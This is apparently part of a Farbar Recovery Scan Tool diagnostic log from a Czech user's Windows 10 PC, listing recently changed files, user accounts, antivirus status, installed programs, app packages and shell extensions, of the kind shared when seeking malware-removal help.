2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 07:09 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-20 07:08 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 07:08 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-19 21:49 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-19 19:22 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-18 17:25 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 19:23 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-15 07:42 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 07:16 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-14 07:16 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-14 07:16 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-14 07:11 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-14 07:11 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-14 07:11 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-14 07:11 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:19 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-09 08:05 - 2017-03-10 18:17 - 000044003 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

2.část

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-01-2021
Ran by IRENA-PC (20-01-2021 07:17:24)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
